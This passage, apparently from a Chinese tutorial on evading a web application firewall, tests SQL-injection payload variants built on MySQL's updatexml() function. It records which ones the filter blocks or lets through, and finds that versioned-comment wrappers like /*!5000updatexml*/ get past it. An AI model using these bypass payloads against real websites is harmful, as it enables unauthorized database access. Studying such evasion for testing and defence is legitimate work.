不拦截
updatexml(1,2) 不拦截
updatexml(1,2,) 不拦截
updatexml(,2,1) 不拦截
updatexml(1,2,!)...拦截
updatexml(1,2,%) 拦截
updatexml(,2,1,hex()) 拦截
and updatexml(1,2,3 不拦截
updatexml(1,2,3) 拦截
and...,那么我们还有 什么方法呢, 可以尝试把updatexml() 函数分开,或者给updatexml 加个外套。.../*updatexml*/(1,1,1) 不拦截
/*!updatexml*/(1,1,1) 拦截
/*!5000updatexml*/(1,1,1) 不拦截
/*!...11440updatexml*/(1,1,1) 不拦截
看来 updatexml() 函数我们已经绕过了 需要前面加个 运算符号了
and /*!